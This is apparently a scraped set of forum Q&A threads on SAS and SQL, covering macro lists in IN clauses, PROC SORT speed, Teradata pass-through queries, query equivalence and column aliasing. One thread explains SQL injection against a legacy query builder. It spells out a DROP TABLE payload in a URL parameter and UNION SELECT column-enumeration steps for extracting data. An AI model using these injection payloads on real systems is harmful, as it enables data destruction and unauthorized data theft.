SAS Macro variable to represent what is in an IN statement in Proc SQL - sql

I have a query I want to run through SAS in Proc SQL where I am getting data from one of our company databases. At the top of the query, for ease of use mostly, I want to be able to put a list of input variables. I am interested in getting data only in certain dates and certain states. The dates I care about are contiguous so I just make a SAS macro variable for the start date and end date and use a between statement. That's easy enough. But, for the states, I can't do such a thing. So, my thought was to do something like
%LET States = ('CT', 'MD', 'ME', 'NC', 'WV');
and then later on, I want to do a where statement
WHERE (State_Tp IN &States)
Now, this does not work. And, I've tried several other variations but I can't seem to get it to work. Is something like this possible?

While your code is fine as is, a better solution (that might have less issues anyway) would be to create a dataset with the desired states, and join against it (or use an exists clause if that is better for your needs). This is easier to maintain (as you can keep the dataset in an easily editable format separate from the code, like in excel) and may be faster in some cases.
data states;
input state_tp $;
datalines;
CT
MD
ME
NC
WV
;;;;
run;
proc sql;
create table test as
select Z.*
from sashelp.zipcode Z
inner join
states s
on z.state_tp=s.state_tp;
quit;
or
proc sql;
create table test as
select * from sashelp.zipcode z
where exists (
select 1 from states s
where s.state_tp=z.state_tp);
quit;

Related

why the proc sort is way quicker than an insert select

I have a table with many duplicate lines.
Let's say I have table A with 10 millions lines and a single column without index or primary key.
I did this, first. I created another table , B, and do this
INSERT INTO B (col1) SELECT DISTINCT (col1) FROM A;
Issue is the performance is slow. Then I found this command
proc sort data=A out=B noduprecs;
by col1;
run;
It took only 2 seconds.
Why is it faster therefore better to use a proc sortthen an insert select?
How the proc sort is working and ultimately , be able to deal with so many lines without any indexes?
I could not find anything on the net for the explanations.
TIA
I think we need to know a litle more about your SAS configuration, as I'm definitely not seeing the same results as you. This is the code I used to test:
Test code
Create some test data, 10M rows, with a random integer between 0 and 1000:
data x;
do cnt=1 to 10000000;
x = floor(rand("Uniform") * 1000);
output;
end;
drop cnt;
run;
Try sorting it and keeping distinct values using proc sort. Run this multiple times to get an average time:
proc sort data=x out=test1 nodupkey;
by x;
run;
Try using the proc sql method. Again, run it multiple times to get an average time:
proc sql noprint;
create table test2 as
select distinct x
from x
order by 1
;
quit;
Try using the 'insert into' method. Run multiple times:
proc sql noprint;
create table b like x;
insert into b (x) select distinct (x) from x;
quit;
Results
On my machine, SAS9.4, Windows 64bit, the proc sort took about 4 seconds on average and the sql sort took about 5 seconds. So yes the proc sort did run a little faster for this dataset. Changing the number of rows, columns, field type being sorted on, and cardinality of the key can all change these results.
The insert into statement ran the quickest at 3.2 seconds. Is your table that you are writing to a SAS dataset? Or is it located in another database? This will have the biggest impact on your results and should be the determining factor when choosing which step to run.
You could be even faster with
proc sort data=A(keep=col1) out=B nodupkey;
by col1;
run;
Try to compare INSERT and SORT with:
proc sql;
create table B as select distinct col1 from A;
quit;
The experience simply teaches us that PROC SORT is faster than sorting/distinct in PROC SQL implementation. It's just not an official statement, for all situations and not always by such degree.
Is A and B table a SAS BASE libname?
The problem of INSERT version could also be that since the target is predefined, there's surely some checking of value being inserted to fit into target fields, which is maybe less expensive when creating new table.

How to do damage with SQL by adding to the end of a statement?

Perhaps I am not creative or knowledgeable enough with SQL... but it looks like there is no way to do a DROP TABLE or DELETE FROM within a SELECT without the ability to start a new statement.
Basically, we have a situation where our codebase has some gigantic, "less-than-robust" SQL generation component that never uses prepared statements and we now have an API that interacts with this legacy component.
Right now we can modify a query by appending to the end of it, but have been unable to insert any semicolons. Thus, we can do something like this:
/query?[...]&location_ids=loc1')%20or%20L1.ID%20in%20('loc2
which will result in this
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('loc1') or L1.ID in ('loc2');...
This is just one example.
Basically we can append pretty much anything to the end of any/most generated SQL queries, less adding a semicolon.
Any ideas on how this could potentially do some damage? Can you add something to the end of a SQL query that deletes from or drops tables? Or create a query so absurd that it takes up all CPU and never completes?
You said that this:
/query?[...]&location_ids=loc1')%20or%20L1.ID%20in%20('loc2
will result in this:
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('loc1') or L1.ID in ('loc2');
so it looks like this:
/query?[...]&location_ids=');DROP%20TABLE users;--
will result in this:
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('');DROP TABLE users;--');
which is a SELECT, a DROP and a comment.
If it’s not possible to inject another statement, you limited to the existing statement and its abilities.
Like in this case, if you are limited to SELECT and you know where the injection happens, have a look at PostgreSQL’s SELECT syntax to see what your options are. Since you’re injecting into the WHERE clause, you can only inject additional conditions or other clauses that are allowed after the WHERE clause.
If the result of the SELECT is returned back to the user, you may want to add your own SELECT with a UNION operation. However, PostgreSQL requires compatible data types for corresponding columns:
The two SELECT statements that represent the direct operands of the UNION must produce the same number of columns, and corresponding columns must be of compatible data types.
So you would need to know the number and data types of the columns of the original SELECT first.
The number of columns can be detected with the ORDER BY clause by specifying the column number like ORDER BY 3, which would order the result by the values of the third column. If the specified column does not exist, the query will fail.
Now after determining the number of columns, you can inject a UNION SELECT with the appropriate number of columns with an null value for each column of your UNION SELECT:
loc1') UNION SELECT null,null,null,null,null --
Now you determine the types of each column by using a different value for each column one by one. If the types of a column are incompatible, you may an error that hints the expected data type like:
ERROR: invalid input syntax for integer
ERROR: UNION types text and integer cannot be matched
After you have determined enough column types (one column may be sufficient when it’s one that is presented the user), you can change your SELECT to select whatever you want.

Writing Efficient Queries in SAS Using Proc sql with Teradata

EDIT: Here is a more complete set of code that shows exactly what's going on per the answer below.
libname output '/data/files/jeff'
%let DateStart = '01Jan2013'd;
%let DateEnd = '01Jun2013'd;
proc sql;
CREATE TABLE output.id AS (
SELECT DISTINCT id
FROM mydb.sale_volume AS sv
WHERE sv.category IN ('a', 'b', 'c') AND
sv.trans_date BETWEEN &DateStart AND &DateEnd
)
CREATE TABLE output.sums AS (
SELECT id, SUM(sales)
FROM mydb.sale_volue AS sv
INNER JOIN output.id AS ids
ON ids.id = sv.id
WHERE sv.trans_date BETWEEN &DateStart AND &DateEnd
GROUP BY id
)
run;
The goal is to simply query the table for some id's based on category membership. Then I sum these members' activity across all categories.
The above approach is far slower than:
Running the first query to get the subset
Running a second query the sums every ID
Running a third query that inner joins the two result sets.
If I'm understanding correctly, it may be more efficient to make sure that all of my code is completely passed through rather than cross-loading.
After posting a question yesterday, a member suggested I might benefit from asking a separate question on performance that was more specific to my situation.
I'm using SAS Enterprise Guide to write some programs/data queries. I don't have permissions to modify the underlying data, which is stored in 'Teradata'.
My basic problem is writing efficient SQL queries in this environment. For example, I query a large table (with tens of millions of records) for a small subset of ID's. Then, I use this subset to query the larger table again:
proc sql;
CREATE TABLE subset AS (
SELECT
id
FROM
bigTable
WHERE
someValue = x AND
date BETWEEN a AND b
)
This works in a matter of seconds and returns 90k ID's. Next, I want to query this set of ID's against the big table, and problems ensue. I'm wanting to sum values over time for the ID's:
proc sql;
CREATE TABLE subset_data AS (
SELECT
bigTable.id,
SUM(bigTable.value) AS total
FROM
bigTable
INNER JOIN subset
ON subset.id = bigTable.id
WHERE
bigTable.date BETWEEN a AND b
GROUP BY
bigTable.id
)
For whatever reason, this takes a really long time. The difference is that the first query flags 'someValue'. The second looks at all activity, regardless of what's in 'someValue'. For example, I could flag every customer who orders a pizza. Then I would look at every purchase for all customers who ordered pizza.
I'm not overly familiar with SAS so I'm looking for any advice on how to do this more efficiently or speed things up. I'm open to any thoughts or suggestions and please let me know if I can offer more detail. I guess I'm just surprised the second query takes so long to process.
The most critical thing to understand when using SAS to access data in Teradata (or any other external database for that matter) is that the SAS software prepares SQL and submits it to the database. The idea is to try and relieve you (the user) from all the database specific details. SAS does this using a concept called "implict pass-through", which just means that SAS does the translation from SAS code into DBMS code. Among the many things that occur is data type conversion: SAS only has two (and only two) data types, numeric and character.
SAS deals with translating things for you but it can be confusing. For example, I've seen "lazy" database tables defined with VARCHAR(400) columns having values that never exceed some smaller length (like column for a person's name). In the data base this isn't much of a problem, but since SAS does not have a VARCHAR data type, it creates a variable 400 characters wide for each row. Even with data set compression, this can really make the resulting SAS dataset unnecessarily large.
The alternative way is to use "explicit pass-through", where you write native queries using the actual syntax of the DBMS in question. These queries execute entirely on the DBMS and return results back to SAS (which still does the data type conversion for you. For example, here is a "pass-through" query that performs a join to two tables and creates a SAS dataset as a result:
proc sql;
connect to teradata (user=userid password=password mode=teradata);
create table mydata as
select * from connection to teradata (
select a.customer_id
, a.customer_name
, b.last_payment_date
, b.last_payment_amt
from base.customers a
join base.invoices b
on a.customer_id=b.customer_id
where b.bill_month = date '2013-07-01'
and b.paid_flag = 'N'
);
quit;
Notice that everything inside the pair of parentheses is native Teradata SQL and that the join operation itself is running inside the database.
The example code you have shown in your question is NOT a complete, working example of a SAS/Teradata program. To better assist, you need to show the real program, including any library references. For example, suppose your real program looks like this:
proc sql;
CREATE TABLE subset_data AS
SELECT bigTable.id,
SUM(bigTable.value) AS total
FROM TDATA.bigTable bigTable
JOIN TDATA.subset subset
ON subset.id = bigTable.id
WHERE bigTable.date BETWEEN a AND b
GROUP BY bigTable.id
;
That would indicate a previously assigned LIBNAME statement through which SAS was connecting to Teradata. The syntax of that WHERE clause would be very relevant to if SAS is even able to pass the complete query to Teradata. (You example doesn't show what "a" and "b" refer to. It is very possible that the only way SAS can perform the join is to drag both tables back into a local work session and perform the join on your SAS server.
One thing I can strongly suggest is that you try to convince your Teradata administrators to allow you to create "driver" tables in some utility database. The idea is that you would create a relatively small table inside Teradata containing the ID's you want to extract, then use that table to perform explicit joins. I'm sure you would need a bit more formal database training to do that (like how to define a proper index and how to "collect statistics"), but with that knowledge and ability, your work will just fly.
I could go on and on but I'll stop here. I use SAS with Teradata extensively every day against what I'm told is one of the largest Teradata environments on the planet. I enjoy programming in both.
You imply an assumption that the 90k records in your first query are all unique ids. Is that definite?
I ask because the implication from your second query is that they're not unique.
- One id can have multiple values over time, and have different somevalues
If the ids are not unique in the first dataset, you need to GROUP BY id or use DISTINCT, in the first query.
Imagine that the 90k rows consists of 30k unique ids, and so have an average of 3 rows per id.
And then imagine those 30k unique ids actually have 9 records in your time window, including rows where somevalue <> x.
You will then get 3x9 records back per id.
And as those two numbers grow, the number of records in your second query grows geometrically.
Alternative Query
If that's not the problem, an alternative query (which is not ideal, but possible) would be...
SELECT
bigTable.id,
SUM(bigTable.value) AS total
FROM
bigTable
WHERE
bigTable.date BETWEEN a AND b
GROUP BY
bigTable.id
HAVING
MAX(CASE WHEN bigTable.somevalue = x THEN 1 ELSE 0 END) = 1
If ID is unique and a single value, then you can try constructing a format.
Create a dataset that looks like this:
fmtname, start, label
where fmtname is the same for all records, a legal format name (begins and ends with a letter, contains alphanumeric or _); start is the ID value; and label is a 1. Then add one row with the same value for fmtname, a blank start, a label of 0, and another variable, hlo='o' (for 'other'). Then import into proc format using the CNTLIN option, and you now have a 1/0 value conversion.
Here's a brief example using SASHELP.CLASS. ID here is name, but it can be numeric or character - whichever is right for your use.
data for_fmt;
set sashelp.class;
retain fmtname '$IDF'; *Format name is up to you. Should have $ if ID is character, no $ if numeric;
start=name; *this would be your ID variable - the look up;
label='1';
output;
if _n_ = 1 then do;
hlo='o';
call missing(start);
label='0';
output;
end;
run;
proc format cntlin=for_fmt;
quit;
Now instead of doing a join, you can do your query 'normally' but with an additional where clause of and put(id,$IDF.)='1'. This won't be optimized with an index or anything, but it may be faster than the join. (It may also not be faster - depends on how the SQL optimizer is working.)
If the id is unique you might add a UNIQUE PRIMARY INDEX(id) to that table, otherwise it defaults to a Non-unique PI.
Knowing about uniquenes helps the optimizer to produce a better plan.
Without more info like an Explain (just put EXPLAIN in front of the SELECT) it's hard to tell how this can be improved.
One alternate solution is to use SAS procedures. I don't know what your actual SQL is doing, but if you're just doing frequencies (or something else that can be done in a PROC), you could do:
proc sql;
create view blah as select ... (your join);
quit;
proc freq data=blah;
tables id/out=summary(rename=count=total keep=id count);
run;
Or any number of other options (PROC MEANS, PROC TABULATE, etc.). That may be faster than doing the sum in SQL (depending on some details, such as how your data is organized, what you're actually doing, and how much memory you have available). It has the added benefit that SAS might choose to do this in-database, if you create the view in the database, which might be faster. (In fact, if you just run the freq off the base table, it's possible that would be even faster, and then join the results to the smaller table).

how to prove 2 sql statements are equivalent

I set out to rewrite a complex SQL statement with joins and sub-statements and obtained a more simple looking statement. I tested it by running both on the same data set and getting the same result set. In general, how can I (conceptually) prove that the 2 statements are the same in any given data set?
I would suggest studying relational algebra (as pointed out by Mchl). It is the most essential concept you need if you want to get serious about optimizing queries and designing databases properly.
However I will suggest an ugly brute force approach that helps you to ensure correct results if you have sufficient data to test with: create views of both versions (for making the comparisons easier to manage) and compare the results. I mean something like
create view original as select xxx yyy zzz;
create view new as select xxx yyy zzz;
-- If the amount differs something is quite obviously very wrong
select count(*) from original;
select count(*) from new;
-- What is missing from the new one?
select *
from original o
where not exists (
select *
from new n
where o.col1=n.col2 and o.col2=n.col2 --and so on
);
-- Did something extra appear?
select *
from new o
where not exists (
select *
from old n
where o.col1=n.col2 and o.col2=n.col2 --and so on
)
Also as pointed out by others in comments you might feed both the queries to the optimizers of the product you are working with. Most of the time you get something that can be parsed with humans, complete drawings of the execution paths with the subqueries' impact on the performance etc. It is most often done with something like
explain plan for
select *
from ...
where ...
etc

Is there a way to rename a similarly named column from two tables when performing a join?

I have two tables that I am joining with the following query...
select *
from Partners p
inner join OrganizationMembers om on p.ParID = om.OrganizationId
where om.EmailAddress = 'my_email#address.com'
and om.deleted = 0
Which works great but some of the columns from Partners I want to be replaced with similarly named columns from OrganizationMembers. The number of columns I want to replace in the joined table are very few, shouldn't be more than 3.
It is possible to get the result I want by selectively choosing the columns I want in the resulting join like so...
select om.MemberID,
p.ParID,
p.Levelz,
p.encryptedSecureToken,
p.PartnerGroupName,
om.EmailAddress,
om.FirstName,
om.LastName
from Partners p
inner join OrganizationMembers om on p.ParID = om.OrganizationId
where om.EmailAddress = 'my_email#address.com'
and om.deleted = 0
But this creates a very long sequence of select p.a, p.b, p.c, p.d, ... etc ... which I am trying to avoid.
In summary I am trying to get several columns from the Partners table and up to 3 columns from the OrganizationMembers table without having a long column specification sequence at the beginning of the query. Is it possible or am I just dreaming?
select om.MemberID as mem
Use th AS keyword. This is called aliasing.
You are dreaming in your implementation.
Also, as a best practice, select * is something that is typically frowned upon by DBA's.
If you want to limit the results or change anything you must explicitly name the results, as a potential "stop gap you could do something like this.
SELECT p.*, om.MemberId, etc..
But this ONLY works if you want ALL columns from the first table, and then selected items.
Try this:
p.*,
om.EmailAddress,
om.FirstName,
om.LastName
You should never use * though. Always specifying the columns you actually need makes it easier to find out what happens.
But this creates a very long sequence
of select p.a, p.b, p.c, p.d, ... etc
... which I am trying to avoid.
Don't avoid it. Embrace it!
There are lots of reasons why it's best practice to explicity list the desired columns.
It's easier to do searches for where a particular column is being used.
The behavior of the query is more obvious to someone who is trying to maintain it.
Adding a column to the table won't automatically change the behavior of your query.
Removing a column from the table will break your query earlier, making bugs appear closer to the source, and easier to find and fix.
And anything that uses the query is going to have to list all the columns anyway, so there's no point being lazy about it!